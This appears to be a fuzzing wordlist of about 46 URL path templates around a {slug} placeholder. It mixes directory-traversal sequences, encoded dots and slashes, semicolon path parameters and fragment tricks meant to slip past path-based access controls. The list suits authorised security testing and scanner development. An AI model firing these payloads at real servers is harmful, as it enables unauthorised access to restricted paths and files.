/#{slug}
/#?{slug}
/%2e%2e/{slug}
/#{slug}
/%2e%2e/{slug}
/{slug}%3b/%2e.
/{slug}%3b/..
/{slug}/%2e%2e
/{slug}/%2e%2e/
/{slug}/..
/{slug}/../
/{slug}/../../
/{slug}/../../../
/{slug}/../../..//
/{slug}/../..//
/{slug}/../..//../
/{slug}/.././../
/{slug}/../.;/../
/{slug}/..//
/{slug}/..//../
/{slug}/..//../../
/{slug}/../;/../
/{slug}/..;/
/{slug}/..;//../
/{slug}//../../
/{slug};%2f%2f/../
/{slug};%2f..%2f/../
/{slug};/%2e%2e
/{slug};/%2e%2e/
/{slug};/%2e.
/{slug};/.%2e
/{slug};/..
/{slug};/../
/{slug};/../../
/{slug};/../..//
/{slug};/.././../
/{slug};/../.;/../
/{slug};/..//
/{slug};/..//%2e%2e/
/{slug};/..//../
/{slug};/..///
/{slug};/../;/../
/{slug};/..
/{slug};//../../
/;/..//%2e%2e/{slug}
/#{slug}